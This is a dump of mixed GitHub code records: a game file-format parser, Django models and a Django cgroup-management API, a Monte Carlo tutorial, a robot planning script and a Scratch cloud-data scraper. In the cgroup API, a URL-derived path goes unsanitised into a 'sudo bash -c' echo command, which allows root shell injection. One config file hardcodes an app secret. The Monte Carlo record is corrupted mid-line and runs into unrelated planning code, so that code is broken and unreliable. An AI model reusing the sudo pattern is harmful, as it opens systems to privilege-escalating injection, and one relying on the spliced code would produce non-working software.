+{"seq_id":"38949272652","text":"# Source: http://www.metroid2002.com/retromodding/wiki/HINT_(File_Format)\n\nimport dataclasses\nimport struct\n\nfrom util import unpack_null_terminated_ascii, pack_null_terminated_ascii\n\n__all__ = (\"HintLocation\", \"Hint\", \"HINT\")\n\n\n@dataclasses.dataclass(frozen=True)\nclass HintLocation:\n _struct = struct.Struct(\">IIII\")\n\n world_MLVL_asset_ID: int\n room_MREA_asset_ID: int\n room_index: int\n map_text_STRG_asset_ID: int\n\n @classmethod\n def from_packed(cls, packed: bytes):\n return cls(*cls._struct.unpack(packed))\n\n @property\n def packed_size(self) -> int:\n return 4 + 4 + 4 + 4\n\n def packed(self) -> bytes:\n return self._struct.pack(\n self.world_MLVL_asset_ID,\n self.room_MREA_asset_ID,\n self.room_index,\n self.map_text_STRG_asset_ID,\n )\n\n\n@dataclasses.dataclass(frozen=True)\nclass Hint:\n _struct = struct.Struct(\">ffIII\")\n\n name: str\n immediate_time: float\n normal_time: float\n text_STRG_asset_ID: int\n page_count: int\n location_count: int\n locations: tuple = dataclasses.field(repr=False)\n\n @classmethod\n def from_packed(cls, packed: bytes):\n offset = packed.index(b\"\\x00\") + 1\n name = unpack_null_terminated_ascii(packed[:offset])\n\n immediate_time, normal_time, text_STRG_asset_ID, \\\n page_count, location_count = cls._struct.unpack(packed[offset:offset+20])\n offset += 20\n\n return cls(\n name,\n immediate_time,\n normal_time,\n text_STRG_asset_ID,\n page_count,\n location_count,\n tuple(HintLocation.from_packed(packed[offset + 16*i:offset + 16*(i+1)]) for i in range(location_count)),\n )\n\n @property\n def packed_size(self) -> int:\n return len(self.packed())\n\n def packed(self) -> bytes:\n return b\"\".join((\n pack_null_terminated_ascii(self.name),\n self._struct.pack(\n self.immediate_time,\n self.normal_time,\n self.text_STRG_asset_ID,\n self.page_count,\n self.location_count,\n ),\n *(location.packed() for location in self.locations),\n ))\n\n\n@dataclasses.dataclass(frozen=True)\nclass HINT:\n _struct = struct.Struct(\">III\")\n\n magic: int\n version: int\n hint_count: int\n hints: tuple = dataclasses.field(repr=False)\n\n @classmethod\n def from_packed(cls, packed: bytes):\n magic, version, hint_count = cls._struct.unpack(packed[:12])\n\n offset = 12\n hints = []\n for i in range(hint_count):\n hint = Hint.from_packed(packed[offset:])\n hints.append(hint)\n offset += hint.packed_size\n\n return cls(magic, version, hint_count, tuple(hints))\n\n @property\n def packed_size(self) -> int:\n return len(self.packed())\n\n def packed(self) -> bytes:\n return b\"\".join(\n self._struct.pack(self.magic, self.version, self.hint_count),\n *(hint.packed() for hint in self.hints),\n )\n\n def with_hints_replaced(self, new_hints):\n new_hints = tuple(new_hints)\n return dataclasses.replace(self, hint_count=len(new_hints), hints=new_hints)","repo_name":"SpaghettiToastBook/echoes-patching-library","sub_path":"hint.py","file_name":"hint.py","file_ext":"py","file_size_in_byte":3266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72077204967","text":"import os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\ndef database_infos_func():\n database_infos = {\n \"app_key\": \"app_key\",\n \"app_secret\": \"33app_secret7f2cb08516d060a37c47243b91d20f\",\n \"codigo_conta_corrente\": \"codigo_conta_corrente\",\n \"estoque_box\": \"estoque_box\",\n \"codigo_local_estoque_galpao\": \"codigo_local_estoque_galpao\",\n \"app_key_parceiro\": os.getenv(\"APP_KEY_PARCEIRO\"),\n \"app_secret_parceiro\": os.getenv(\"APP_SECRET_PARCEIRO\")\n }\n return database_infos","repo_name":"VinicioSales/controladorDeEstoques","sub_path":"config/credenciais/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72870935848","text":"\n\n\"\"\"\nDerivation of the normalizing constant for the standard Normal distribution\n===========================================================================\n\nBelow we illustrate how to derive this constant analytically and and how to\napproximate it by sampling.\n\nAnalytical derivation\n---------------------\n\nThe probability density function of a standard Normal distribution, :math:`f_Z(z)` is\n\n.. math::\n f_Z(z)=\\\\frac{1}{K}\\exp(-\\\\frac{z^2}{2})\n\nBecause :math:`f_Z(z)` is a probability density function, it follows that\n\n.. math::\n 1=\\int_{-\\infty}^\\infty f_Z(z)dz=\\\\frac{1}{K}\\int_{-\\infty}^\\infty\\exp(-\\\\frac{z^2}{2})dz\n\nThen\n\n.. math::\n \\\\begin{align}\n K&=\\int_{-\\infty}^\\infty\\exp(-\\\\frac{z^2}{2})dz\\\\\\\\\n K^2&=\\int_{-\\infty}^\\infty\\int_{-\\infty}^\\infty\\exp(-\\\\frac{x^2}{2})\\exp(-\\\\frac{y^2}{2})dxdy=\\int_{-\\infty}^\\infty\\int_{-\\infty}^\\infty\\exp(-\\\\frac{x^2+y^2}{2}))dxdy\n \\\\end{align}\n\n\nWe now make the change of variables\n\n.. math::\n \\\\begin{align}\n r&=\\sqrt{x^2+y^2}\\\\\\\\\n \\\\theta&=\\\\arctan(\\\\frac{x}{y})\n \\\\end{align}\n\n\nfor which\n\n.. math::\n \\\\begin{align}\n x(r,\\\\theta)&=r\\cos(\\\\theta)\\\\\\\\\n y(r,\\\\theta)&=r\\sin(\\\\theta)\n \\\\end{align}\n\nwith Jacobian\n\n.. math::\n \\\\begin{align}\n J(r,\\\\theta)=\\\\left |\\\\begin{array}{cc}\n \\\\frac{\\\\partial x}{\\\\partial r}(r,\\\\theta)&\\\\frac{\\\\partial x}{\\\\partial \\\\theta}(r,\\\\theta)\\\\\\\\\n \\\\frac{\\\\partial y}{\\\\partial r}(r,\\\\theta)&\\\\frac{\\\\partial y}{\\\\partial \\\\theta}(r,\\\\theta)\n \\\\end{array}\\\\right |\n =\\\\left |\\\\begin{array}{cc}\n \\cos(\\\\theta) & -r\\sin(\\\\theta)\\\\\\\\\n \\sin(\\\\theta) & r\\cos(\\\\theta)\n \\\\end{array}\\\\right |\n =r\\\\cos^2(\\\\theta)+r\\\\sin^2(\\\\theta)=r(\\\\cos^2(\\\\theta)+\\\\sin^2(\\\\theta))=r\n \\\\end{align}\n\nand obtain\n\n.. math::\n \\\\begin{align}\n K^2&=\\int_0^{2\\pi}\\int_0^\\infty\\exp(-\\\\frac{r^2}{2}))|J(r,\\\\theta)|drd\\\\theta=\\int_0^{2\\pi}\\int_0^\\infty\n r\\exp(-\\\\frac{r^2}{2})drd\\\\theta=\\int_0^{2\\pi}\\left(\\left.\\exp(-\\\\frac{r^2}{2}))\\\\right\n |_0^\\infty\\\\right)d\\\\theta\\\\\\\\\n &=\\int_0^{2\\pi}1d\\\\theta=2\\pi\n \\\\end{align}\n\nthen :math:`K=\\sqrt{2\\pi}\\simeq 2.51`.\n\nEstimation by sampling\n----------------------\n\nWe can also estimate :math:`K` by sampling. :math:`K` is the area under the\nfunction :math:`\\\\tilde{f}_Z(z)=\\\\exp(-\\\\frac{z^2}{2})`. To estimate this area\nwe \n\n\n1. enclose most of the function :math:`\\\\tilde{f}_Z(z)` by a box, \n\n2. draw uniformly distributed samples in this box.\n\n3. calculate the proportion of samples below :math:`\\\\tilde{f}_Z(z)`.\n\nNow, the ratio of the area under the function :math:`\\\\tilde{f}_Z(z)`,\n:math:`K`, to the area\nof the enclosing box, :math:`B`, should be similar to the proportion of uniformly distributed\nsamples in the box that fell below function :math:`\\\\tilde{f}_Z(z)`,\n:math:`p\\_under`. That is :math:`\\\\frac{K}{B}\\\\simeq p\\_under`, or\n:math:`K\\simeq B\\;p\\_under`.\n\n\"\"\"\n\n#%%\n# Import requirements\n# -------------------\n\nimport numpy as np\nimport plotly.graph_objects as go\n\n\n#%%\n# Define constant\n# ---------------\n\nlower_z = -5.0\nupper_z = 5.0\nn_z = 1000\nn_random = 100000\n\nzs = np.linspace(lower_z, upper_z, n_z)\nf_hat = lambda z: np.exp(-z**2/2)\nf_hat_values = f_hat(zs)\nbox_height = f_hat(0)\nbox = np.ones(n_z)\n\n#%%\n# Sample uniform points in the box\n# --------------------------------\n\nrandom_x = np.random.uniform(low=lower_z, high=upper_z, size=n_random)\nrandom_y = np.random.uniform(low=0, high=1, size=n_random)\n\n#%%\n# Calculate the proportion of samples below unnormalized pdf\n# ----------------------------------------------------------\n\ncount_under = 0\nindices_under = []\nindices_above = []\nfor i in range(n_random):\n if random_y[i] lower_KL_divergance_threshold:\n search_levels_dict[level].append(predicted_probas['Push'])\n # search_KL_divergance[level].append(scipy.stats.entropy(predicted_probas['Push'], goal_proba))\n search_KL_divergance[level].append(scipy.stats.entropy(goal_proba + 1e-10, predicted_probas['Push'] + 1e-10))\n search_action_dict[level].append(copy.deepcopy(search_action_dict[pre_level][proba_index]))\n search_action_dict[level][-1].append('Push')\n\n if mate_predict_kl > lower_KL_divergance_threshold:\n search_levels_dict[level].append(predicted_probas['Mate'])\n # search_KL_divergance[level].append(scipy.stats.entropy(predicted_probas['Mate'], goal_proba))\n search_KL_divergance[level].append(scipy.stats.entropy(goal_proba + 1e-10, predicted_probas['Mate'] + 1e-10))\n search_action_dict[level].append(copy.deepcopy(search_action_dict[pre_level][proba_index]))\n search_action_dict[level][-1].append('Mate')\n\n # print('search_KL_divergance: ', search_KL_divergance)\n # print('search_action_dict: ', search_action_dict)\n # exit()\n\n def insert_queue(KL_action_pair: list, KL_action_queue: list):\n cur_KL_divergances = []\n for pair in KL_action_queue:\n cur_KL_divergances.append(pair[0])\n cur_KL_divergances = np.array(cur_KL_divergances)\n insert_index = np.sum(KL_action_pair[0] > cur_KL_divergances)\n KL_action_queue.insert(insert_index, KL_action_pair)\n\n return\n\n lower_KL_action_queue = []\n higher_KL_action_queue = []\n best_action_pair = None\n\n for i in range(0, search_level):\n\n level = '{}_level'.format(i)\n\n for KL_index, KL_divergance in enumerate(search_KL_divergance[level]):\n\n KL_action_pair = [KL_divergance, search_action_dict[level][KL_index]]\n\n if KL_divergance < lower_KL_divergance_threshold:\n insert_queue(KL_action_pair=KL_action_pair, KL_action_queue=lower_KL_action_queue)\n\n elif KL_divergance < higher_KL_divergance_threshold:\n insert_queue(KL_action_pair=KL_action_pair, KL_action_queue=higher_KL_action_queue)\n\n if not len(lower_KL_action_queue) == 0:\n best_action_pair = lower_KL_action_queue[0]\n break\n\n predicted_probs = []\n\n if best_action_pair is None and not len(higher_KL_action_queue) == 0:\n best_action_pair = higher_KL_action_queue[0]\n\n if len(lower_KL_action_queue) == 0 and len(higher_KL_action_queue) == 0:\n return None, [], [], {}\n\n if len(best_action_pair[1]) == 0:\n return 'End', ['End'], [], {}\n else:\n plan = copy.deepcopy(best_action_pair[1])\n plan_copy = copy.deepcopy(plan)\n while len(plan_copy):\n for key, value in search_action_dict.items():\n if plan_copy in value:\n predicted_probs.append(search_levels_dict[key][value.index(plan_copy)])\n plan_copy.pop()\n predicted_probs.reverse()\n plan.append('End')\n\n for index, action in enumerate(plan):\n if action != 'End':\n action_prob_dict[action.lower()] = predicted_probs[index]\n\n return plan[0], plan, predicted_probs, action_prob_dict\n\n\ndef find_end_state_distribution():\n latent_vectors_test = np.load(file_path(file_name=encoded_latent_vectors_npy, file_path=True, split='train'))\n image_labels_test = np.load(file_path(file_name=image_labels_npy, file_path=True, split='train'))\n\n if len(np.unique(image_labels_test)) == 4:\n ending = end_label\n elif len(np.unique(image_labels_test)) == 11:\n ending = end_states\n\n for state in ending:\n vector_index_options = np.where(image_labels_test == state)[0]\n summation = np.zeros((cluster_center_num))\n for index in vector_index_options:\n summation = latent_vec_2_cluster_proba(latent_vectors_test[index, :]) + summation\n\n end_state_distibution = summation / np.sum(summation)\n np.save(file_path(file_name=end_state_distribution_npy, file_path=False, split=None), end_state_distibution)\n return end_state_distibution\n\n\ndef plan_test(end_state_distribution: np.ndarray=None):\n latent_vectors_test = np.load(file_path(file_name=encoded_latent_vectors_npy, file_path=True, split='test'))\n image_labels_test = np.load(file_path(file_name=image_labels_npy, file_path=True, split='test'))\n\n latent_vectors_train = np.load(file_path(file_name=encoded_latent_vectors_npy, file_path=True, split='train'))\n image_labels_train = np.load(file_path(file_name=image_labels_npy, file_path=True, split='train'))\n\n # eval_data_distribution(image_labels_test, latent_vectors_test)\n\n if len(np.unique(image_labels_test)) == 4:\n ending = end_label\n elif len(np.unique(image_labels_test)) == 11:\n ending = end_states\n\n if isinstance(end_state_distribution, np.ndarray):\n goal_proba = end_state_distribution\n\n elif end_state_distribution is None:\n goal_proba = np.load(file_path(file_name=end_state_distribution_npy, file_path=True, split=None))\n\n # goal_proba =np.array([0, 1, 0, 0], dtype=np.float32)\n # print('goal_proba: ', goal_proba)\n # print('latent_vectors_test: ', latent_vectors_test.shape)\n # print('image_labels_test: ', image_labels_test.shape)\n \n average_vectors = {}\n for i in np.unique(image_labels_test):\n i_indices = np.where(image_labels_test == i)[0]\n for index in i_indices:\n # print('latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]): ', latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]).shape)\n proba = latent_vec_2_cluster_proba(latent_vectors_test[index, :]).reshape(-1, 4)\n # print('proba: ', proba)\n # exit()\n if i in list(average_vectors.keys()):\n average_vectors[i] += proba\n else:\n average_vectors[i] = proba\n average_vectors[i] /= len(i_indices)\n np.set_printoptions(precision=3, suppress=True)\n # print('test average_vectors: ', average_vectors)\n\n average_vectors = {}\n for i in np.unique(image_labels_train):\n i_indices = np.where(image_labels_train == i)[0]\n for index in i_indices:\n # print('latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]): ', latent_vec_2_cluster_proba(latent_vectors_test[i_indices, :]).shape)\n proba = latent_vec_2_cluster_proba(latent_vectors_train[index, :]).reshape(-1, 4)\n # print('proba: ', proba)\n # exit()\n if i in list(average_vectors.keys()):\n average_vectors[i] += proba\n else:\n average_vectors[i] = proba\n average_vectors[i] /= len(i_indices)\n np.set_printoptions(precision=3, suppress=True)\n # print('train average_vectors: ', average_vectors)\n\n # exit()\n\n success_num = 0\n first_success_num = 0\n test_num = 330\n tested_indices = []\n\n sequences_test_num = {}\n sequences_test_success_num = {}\n sequences_test_first_success_num = {}\n\n bar = Bar('Processing', max=test_num)\n for _ in range(test_num):\n while True:\n rand_index = np.random.randint(latent_vectors_test.shape[0])\n\n initial_label = image_labels_test[rand_index]\n cur_label = copy.deepcopy(initial_label)\n # if not cur_label == 3:\n # continue\n\n cur_latent_vector = latent_vectors_test[rand_index, :]\n\n if not rand_index in tested_indices:\n break\n tested_indices.append(rand_index)\n\n Groundtruth_plan = groundtruth_plan[action_type[initial_label]]\n initial_plan = None\n executed_plan = []\n if not action_type[initial_label] in list(sequences_test_num.keys()):\n sequences_test_num[action_type[initial_label]] = 1\n sequences_test_success_num[action_type[initial_label]] = 0\n sequences_test_first_success_num[action_type[initial_label]] = 0\n\n sequences_test_num[action_type[initial_label]] += 1\n\n loop_times = 0\n while True:\n proba = latent_vec_2_cluster_proba(cur_latent_vector)\n # test = search_plan(init_proba=proba, goal_proba=goal_proba)\n # print(len(test))\n predicted_action, plan, _, _ = search_plan(init_proba=proba, goal_proba=goal_proba)\n # print('cur_label: ', list(action_type.values())[int(cur_label)])\n # print('plan: ', plan)\n # print('#'*50)\n\n if not plan is None and initial_plan is None:\n initial_plan = copy.deepcopy(plan)\n if not predicted_action is None:\n executed_plan.append(predicted_action)\n\n if predicted_action == 'End' or predicted_action is None:\n break\n\n cur_label, cur_latent_vector = simulate_action(cur_label=cur_label,\n action=predicted_action,\n latent_vectors=latent_vectors_test,\n image_labels=image_labels_test)\n loop_times += 1\n if loop_times > 5:\n break\n # exit()\n # print('executed_plan: ', executed_plan)\n # print('initial_plan: ', initial_plan)\n # print('Groundtruth_plan: ', Groundtruth_plan)\n # exit()\n\n if initial_plan == executed_plan and initial_plan in Groundtruth_plan:\n sequences_test_first_success_num[action_type[initial_label]] += 1\n first_success_num += 1\n\n if cur_label in ending and not predicted_action is None:\n sequences_test_success_num[action_type[initial_label]] += 1\n success_num += 1\n bar.next()\n bar.finish()\n print('success rate: ', success_num / test_num)\n print('first success rate: ', first_success_num / test_num)\n print('#' * 50)\n for key, value in sequences_test_num.items():\n print('value: ', value)\n test_num_temp = value\n test_success_num_temp = sequences_test_success_num[key]\n test_first_success_num_temp = sequences_test_first_success_num[key]\n\n print('test num: ', value)\n print('success num: ', test_success_num_temp)\n print('first success num: ', test_first_success_num_temp)\n\n print('{} success rate: '.format(key), test_success_num_temp / test_num_temp)\n print('{} first success rate: '.format(key), test_first_success_num_temp / test_num_temp)\n\n return plan\n\n\ndef simulate_action(cur_label, action, latent_vectors, image_labels):\n\n Dynamic = {'Push': Push_dynamic, 'Mate': Mate_dynamic}\n next_labels = np.where(Dynamic[action][int(cur_label), :] == 1)[0]\n\n vector_index_options = np.where(image_labels == next_labels)[0]\n rand_vector_index = np.random.choice(vector_index_options)\n next_label = image_labels[rand_vector_index]\n next_laten_vector = latent_vectors[rand_vector_index, :]\n\n return next_label, next_laten_vector\n\n\ndef predict_proba(init_proba: np.ndarray):\n\n assert init_proba.shape[0] == cluster_center_num\n\n A = np.zeros((label_num, label_num))\n A_push = np.zeros((label_num, label_num))\n A_mate = np.zeros((label_num, label_num))\n A_self = np.eye(label_num)\n\n for push in Push:\n A[push[0], push[1]] = 1\n A_push[push[0], push[1]] = 1\n\n for mate in Mate:\n A[mate[0], mate[1]] = 1\n A_mate[mate[0], mate[1]] = 1\n\n for self_ in Self:\n A[self_[0], self_[1]] = 1\n for self_ in Push_self:\n A_push[self_[0], self_[1]] = 1\n for self_ in Mate_self:\n A_mate[self_[0], self_[1]] = 1\n\n A = normalize(A, axis=1, norm='l1')\n A_push = normalize(A_push, axis=1, norm='l1')\n A_mate = normalize(A_mate, axis=1, norm='l1')\n # print('A_push: ', np.where(A_push==1))\n # print('A_mate: ', np.where(A_mate==1))\n\n\n init_cluster_prob = init_proba\n\n init_cluster_prob /= np.sum(init_cluster_prob)\n\n P = np.zeros((cluster_center_num, cluster_center_num))\n\n P_purity_num = np.load(file_path(file_name=label_nums_npy, file_path=True, split=None))\n P_purity_num = P_purity_num.astype(int)\n\n P_purity_col_norm = normalize(P_purity_num, axis=0, norm='l1')\n P_purity_row_norm = normalize(P_purity_num, axis=1, norm='l1')\n np.set_printoptions(precision=3, suppress=True)\n # print('P_purity_col_norm: ', P_purity_col_norm)\n # print('P_purity_row_norm: ', P_purity_row_norm)\n # print('P_purity_num: ', P_purity_num)\n\n action_prob = {'Push': 0, 'Mate': 0}\n P_push = np.zeros((cluster_center_num, cluster_center_num))\n P_mate = np.zeros((cluster_center_num, cluster_center_num))\n\n for i in range(P.shape[0]):\n for j in range(P.shape[1]):\n P_entry = 0\n\n P_entry_push = 0\n P_entry_mate = 0\n for m in range(P_purity_row_norm.shape[1]):\n for n in range(P_purity_row_norm.shape[1]):\n P_entry += P_purity_row_norm[i, m] * A[m, n] * P_purity_col_norm[j, n]\n\n P_entry_push += P_purity_row_norm[i, m] * A_push[m, n] * P_purity_col_norm[j, n]\n P_entry_mate += P_purity_row_norm[i, m] * A_mate[m, n] * P_purity_col_norm[j, n]\n\n P[i, j] = P_entry\n\n P_push[i, j] = P_entry_push\n P_mate[i, j] = P_entry_mate\n\n P_succesor = init_cluster_prob @ P\n\n P_succesor_mate = init_cluster_prob @ P_mate\n P_succesor_push = init_cluster_prob @ P_push\n\n # print('P: ', P)\n # print('#'*25)\n # print('P_mate: ', P_mate)\n # print('P_push: ', P_push)\n # print('P_self: ', P_self)\n\n # print('init_cluster_prob: ', init_cluster_prob)\n # print('P_succesor: ', P_succesor)\n # print('P_succesor_mate: ', P_succesor_mate)\n # print('P_succesor_push: ', P_succesor_push)\n # print('P_succesor_self: ', P_succesor_self)\n\n # print('P_succesor_mate: ', np.sum(P_succesor_mate))\n # print('P_succesor_push: ', np.sum(P_succesor_push))\n # print('P_succesor_self: ', np.sum(P_succesor_self))\n\n # # print('sum: ', P_succesor_mate+P_succesor_push+P_succesor_self)\n\n # print('P_succesor: ', np.sum(P_succesor))\n # print('#' * 50)\n # exit()\n\n return {'Push': P_succesor_push, 'Mate': P_succesor_mate}\n\n\nif __name__ == '__main__':\n end_state_distribution = find_end_state_distribution()\n plan = plan_test(end_state_distribution=None)\n print('plan: ', plan)","repo_name":"mingchen-sjtu/NeuralSymbol_AI","sub_path":"src/fmauch_universal_robot/ur_real_robot/VAE_detect/plan.py","file_name":"plan.py","file_ext":"py","file_size_in_byte":16758,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"10592973902","text":"from django.db import models\n\nclass ArmyShop(models.Model):\n year = models.IntegerField()\n month = models.IntegerField()\n type = models.TextField()\n name = models.TextField()\n\n class Meta:\n db_table = 'army_shop'\n managed = False\n\n# 1. 클래스\n# 2. 모델 상속\n# 3. 속성 => 변수 = OOOField 대입\nclass Course(models.Model):\n # Integer BigInteger\n name = models.CharField(max_length=30)\n cnt = models.IntegerField()","repo_name":"ggoreb/tutorial_aivle","sub_path":"secondapp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27714783452","text":"#A shop will give discount of 10% if the cost of purchased quantity is more than 1000.\n#Ask user for quantity\n#Suppose, one unit will cost 100.\n#Judge and print total cost for user.\n\nq= int(input(\"ENTER QUANTITY\"))\ndis=0\ntotalcost=0\nif(q*100>1000) :\n dis=.10*q*100\n totalcost= q*100 - dis\nelse:\n totalcost = q*100\nprint(\"TOTAL COST IS =\",totalcost) ","repo_name":"axaxthu/CODING-HOME-PRACTICE","sub_path":"shop.py","file_name":"shop.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"69951072807","text":"import os\nfrom subprocess import CalledProcessError, check_call\nfrom urllib.parse import unquote\n\nfrom cgroup_manager.cgroups.serializers import CgroupCreateSerializer, CgroupProcessAddSerializer\nfrom rest_framework.exceptions import NotFound, ValidationError\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_200_OK, HTTP_201_CREATED\n\ncgroup_path_prefix = \"/sys/fs/cgroup/\"\n\n\nclass CGroupProcessListAddAPIView(GenericAPIView):\n \"\"\"Lists tasks pids by cgroup. Raises 404 if cgroup does not exist. 'cgroup_path_fragment' should be urlencoded.\"\"\"\n\n queryset = None\n\n def get(self, request, *args, **kwargs):\n path = os.path.join(\n cgroup_path_prefix, unquote(kwargs[\"hierarchy\"]), unquote(kwargs.get(\"cgroup_path_fragment\", \"\")), \"tasks\")\n if not os.path.exists(path):\n raise NotFound()\n\n with open(path) as f:\n return Response(f.read().splitlines())\n\n def put(self, request, *args, **kwargs):\n \"\"\"Adds task to given cgroup. 'cgroup_path_fragment' should be urlencoded.\"\"\"\n serializer = self.get_serializer_class()(data=request.data)\n serializer.is_valid(raise_exception=True)\n pid = str(serializer.validated_data[\"pid\"]) # otherwise check_call fails\n path = os.path.join(\n cgroup_path_prefix, unquote(kwargs[\"hierarchy\"]), unquote(kwargs.get(\"cgroup_path_fragment\", \"\")), \"tasks\")\n try:\n check_call([\"sudo\", \"bash\", \"-c\", f\"echo {pid} >> {path}\"])\n except CalledProcessError:\n # on purpose. The error should not show command used as this might be a security risk\n raise ValidationError(\n detail={\"errors\": [\"Adding process to cgroup failed. Please check hierarchy and cgroup name.\"]})\n\n return Response(serializer.data, status=HTTP_200_OK)\n\n def get_serializer_class(self):\n # otherwise swagger complains\n if self.request.method == \"PUT\":\n return CgroupProcessAddSerializer\n\n\nclass CgroupCreateAPIView(GenericAPIView):\n \"\"\"Create cgroup in given hierarchy\"\"\"\n\n queryset = None\n serializer_class = CgroupCreateSerializer\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n hierarchy = unquote(kwargs[\"hierarchy\"])\n cgroup_path_fragment = unquote(serializer.validated_data['cgroup_path_fragment'])\n path = os.path.join(cgroup_path_prefix, hierarchy, cgroup_path_fragment)\n try:\n check_call([\"sudo\", \"mkdir\", \"-p\", path])\n except CalledProcessError:\n # on purpose. The error should not show command used as this might be a security risk\n raise ValidationError(\n detail={\"errors\": [\"Creating cgroup returned an error. Please check hierarchy and cgroup name.\"]})\n return Response(serializer.data, status=HTTP_201_CREATED)\n","repo_name":"jacoor/cgroup-manager","sub_path":"cgroup_manager/cgroups/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5426492592","text":"import geopandas\nimport os\n\n\n# shapefile转geojson: shapefile路径 geojson路径\ndef shp_to_geojson(shp_path, geoj_path):\n shp = geopandas.read_file(shp_path)\n shp.to_file(geoj_path, driver=\"GeoJSON\", encoding=\"utf-8\")\n\n\n# geojson转shapefile: geojson路径 shapefile路径\ndef geojson_to_shp(geoj_path, shp_path):\n geoj = geopandas.read_file(geoj_path)\n geoj.to_file(shp_path, driver=\"ESRI Shapefile\", encoding=\"utf-8\")\n\n\nif __name__ == \"__main__\":\n # ws = r'D:\\Work_PhD\\MISR_AHI_WS\\220210'\n # geoj = ws + '/AHI_view.json'\n # shp = ws + '/AHI_view.shp'\n # geojson_to_shp(geoj, shp)\n \n ws = r'D:\\Work_PhD\\MISR_AHI_WS\\221221'\n roi_name = '60.0_1'\n geoj = ws + '/ROIs_ex_json/' + roi_name + '.json'\n shp = ws + '/ROIs_ex_shp/' + roi_name + '_ex.shp'\n shp_to_geojson(shp, geoj)\n # # shp = ws + '/0_50_roi.shp'\n # # geojson_to_shp(geoj, shp)\n\n # ws_folder = r'D:\\Work_PhD\\MISR_AHI_WS\\220331'\n # geoj_folder = os.path.join(ws_folder, 'ROI')\n # shp_folder = os.path.join(ws_folder, 'ROI_shp')\n # if not os.path.exists(shp_folder):\n # os.makedirs(shp_folder)\n # geojs = os.listdir(geoj_folder)\n # for geoj_file in geojs:\n # roi_name = geoj_file.split('.')[0] + '.' + geoj_file.split('.')[1]\n # geoj_filename = os.path.join(geoj_folder, geoj_file)\n # shp_filename = os.path.join(shp_folder, roi_name + '.shp')\n # geojson_to_shp(geoj_filename, shp_filename)","repo_name":"Bosh0113/MISR_AHI","sub_path":"test/common_utils.py","file_name":"common_utils.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5687801879","text":"import requests, time, json\nfrom ScraGet.Exceptions import ProjectNotFound, InvalidValue\nfrom threading import Thread\nfrom typing import Union\n\nheaders = {\"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36\"}\n\nclass get_cloud_data:\n def __init__(self):\n pass\n \n def updateCloud(self, ID : Union[str,int], limit : Union[str,int]= \"10\", offset : Union[str,int]=\"0\") -> None:\n \"\"\"\n Requests to Scratch API for clouddata.\n\n **Params**:\\n\n `ID` - Mandatory. Put the project ID in *str* or *int* format.\\n\n `limit` - Optional (Default=10) Specify number of logs to be returned in *str* or *int* format.\\n\n `offset` - Optional (Default=0) Specify the offset for each log item in *str* or *int* format.\n \"\"\"\n info = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={ID}&limit={limit}&offset={offset}\")\n self.response_object = info\n self.response_time = info.elapsed.total_seconds()\n self.status_code = info.status_code\n \n if self.status_code == 200:\n info = info.json()\n self.cloud_data = info\n\n\nclass cloud:\n def __init__(self):\n self.stop = False\n \n def scan(self, ID: Union[str,int], delay: Union[float,int] = 1.0, NewThread: bool = True) -> None:\n \"\"\"\n Scans clouddata continuously every few seconds (duration to be defined by you while making the cloud class) for any changes.\n\n **Params**:\\n\n `ID` - Mandatory. Put project ID in *str* or *int* format.\\n\n `delay` - Optional(default=1.0). Put the time delay between 2 scan updates in *float* or *int* format. Minimum: 0.1 secs.\\n\n `NewThread` - Optional(default=True). Specify *True* if you need to run in a separate thread, specify *False* if you need to run in main thread. (*bool* format).\n \"\"\"\n\n \n def inner_dec(func):\n y = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={ID}&limit=10000&offset=0\", headers=headers)\n \n if y.status_code == 200:\n y = y.json()\n y = [json.dumps(item) for item in y]\n while True:\n time.sleep(delay)\n if self.stop:\n if NewThread:\n exit(0)\n break\n x = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={ID}&limit=10000&offset=0\", headers=headers)\n if x.status_code != 200: #can get 504\n continue\n x = x.json()\n\n x = [json.dumps(item) for item in x]\n if x != y:\n z = list(set(x) - set(y))\n z = [json.loads(item) for item in z]\n y = x\n self.change_log = z\n self.recent = z[0]\n self.user = z[0][\"user\"]\n self.type = z[0][\"verb\"]\n self.var = z[0][\"name\"]\n self.value = z[0][\"value\"]\n self.time = z[0][\"timestamp\"]\n func(self)\n\n else:\n raise ProjectNotFound(f\"Project with ID {ID} returned a status codes of: {y.status_code}\")\n\n def threaded_dec(func):\n scan_thread = Thread(target=inner_dec, args=(func,))\n scan_thread.setDaemon(True)\n scan_thread.start()\n self.thread = scan_thread\n\n if delay < 0.2:\n raise InvalidValue(\"Delay is less than 0.2. Try making the delay more than 0.2\")\n else:\n if NewThread:\n return threaded_dec\n return inner_dec\n","repo_name":"Quantum-Codes/ScraGet","sub_path":"ScraGet/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
